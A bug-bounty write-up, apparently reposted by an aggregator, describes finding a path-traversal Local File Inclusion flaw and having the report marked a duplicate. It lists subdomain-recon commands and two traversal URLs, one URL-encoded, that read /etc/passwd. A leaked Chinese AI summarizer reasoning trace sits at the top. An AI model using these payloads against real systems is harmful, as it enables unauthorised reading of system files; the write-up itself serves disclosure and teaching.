From Rooted to Rejected: How I Found an LFI… Then Got a “Duplicate” Anyway
嗯,用户让我帮忙总结一篇文章,控制在100字以内,而且不需要特定的开头。首先,我需要仔细阅读文章内容,理解其主要信息。 文章讲的是作者发现了一个本地文件包含漏洞(LFI),成功访问了敏感文件,并负责任地报告了这个漏洞。漏洞很快被修复了,但两天后被告知这是一个重复的漏洞。作者强调了即使被标记为重复,工作也是有价值的。 接下来,我需要将这些要点浓缩到100字以内。要确保涵盖发现漏洞、报告、修复以及被标记为重复的情况。同时,还要传达出作者的观点:即使没有获得奖金,这也是技能和流程的证明。 可能会遇到的问题是如何在有限的字数内准确传达所有关键点。可能需要简化某些步骤,比如提到被动侦察和手动模糊测试,但不需要详细说明工具和技术。 最后,确保语言简洁明了,直接描述事件的过程和结果。 </think> 作者通过被动侦察和手动模糊测试发现了一个本地文件包含(LFI)漏洞,并成功访问敏感文件如`/etc/passwd`。漏洞被修复后,却被告知是重复报告。尽管未获赏金,但展示了技能和影响的重要性。 2025-12-15 07:45:8 Author: infosecwriteups.com(查看原文) 阅读量:4 收藏

Shah kaif

By

| “If you’re getting dupes, you’re not unlucky — you’re just inches away from payout.” | LinkedIn

Press enter or click to view image in full size

Overview

In this post, I’ll walk you through how I discovered a Local File Inclusion (LFI) vulnerability on a real-world target, accessed sensitive files like /etc/passwd, reported it responsibly, and even saw it patched within an hour
Only to be told two days later that it was a duplicate.

Welcome to bug bounty — where you can be right, make impact, and still walk away with zero payout. Here’s how it went down.

Step 1: Recon Like You Mean It

I started with a full passive recon pipeline to identify the maximum attack surface:

amass enum -passive -d target.com -o amass.txt
subfinder -d target.com -o subfinder.txt
sublist3r -d target.com -o sublist3r.txt
assetfinder --subs-only target.com > assetfinder.txt

Combined and cleaned the output:

cat amass.txt subfinder.txt sublist3r.txt assetfinder.txt | sort -u > final_subdomains.txt

Step 2: Finding Live Hosts

To narrow down the scope, I ran:

httpx -l final_subdomains.txt -o live_subdomains.txt

And collected metadata:

httpx -title -td -server -sc -ip -cname -cdn -silent -l live_subdomains.txt -o live_metadata.txt

One subdomain stood out — running Apache, serving some odd static files, and lacking URL sanitization.

Step 3: Manual Fuzzing = Gold

Just manual URL tampering and eyes on response codes. I spotted a file download endpoint and started fuzzing:

https://target.com/icons/../../../../../../../../etc/passwd

Then tried an encoded variant:

https://target.com/icons/.%2e%2e/.%2e%2e/.%2e%2e/.%2e%2e/etc/passwd

And boom 💥 — /etc/passwd dumped in plain text.

Press enter or click to view image in full size

Critical impact. Classic LFI. Valid target.

Press enter or click to view image in full size

Step 4: Report & Rapid Fix and Validation

After Reporting within 1 hour, the endpoint was patched.

  • I verified that the LFI was no longer accessible
  • Received acknowledgment from the team
  • Felt good — this looked solid

At this point, I assumed the bug was accepted.

Press enter or click to view image in full size

Step 5: Two Days Later…

Out of nowhere — two days later — the final verdict came in:

This is a duplicate. Another researcher reported this earlier.”

Even though:

  • The bug was still live when I found and reported it
  • It was fixed only after my submission
  • The triage team had acknowledged it as valid first

The duplicate tag still stood.

A Word to Other Hackers

“Just because it’s marked duplicate, doesn’t mean your work was worthless.”

You built the recon chain.
You found the vulnerability.
You wrote the report.
And your report led to the fix.

Get Shah kaif’s stories in your inbox

Join Medium for free to get updates from this writer.

That’s still a win. It’s validation of your process and skill — and next time, you might just beat the other guy by a minute.

Final Thoughts

Bug bounty isn’t just about payout — it’s about proof of skill, pattern recognition, and timing. This experience reminded me:

  • Recon matters
  • Manual review still wins
  • Timing can be cruel
  • But impact always matters

Even if you get a “duplicate,” remember:

“If you’re getting dupes, you’re not unlucky — you’re just inches away from payout.”

Stay sharp, stay hunting. 🕶️


文章来源: https://infosecwriteups.com/from-rooted-to-rejected-how-i-found-an-lfi-then-got-a-duplicate-anyway-c353e8088ce4?source=rss----7b722bfd1b8d--bug_bounty
如有侵权请联系:admin#unsafe.sh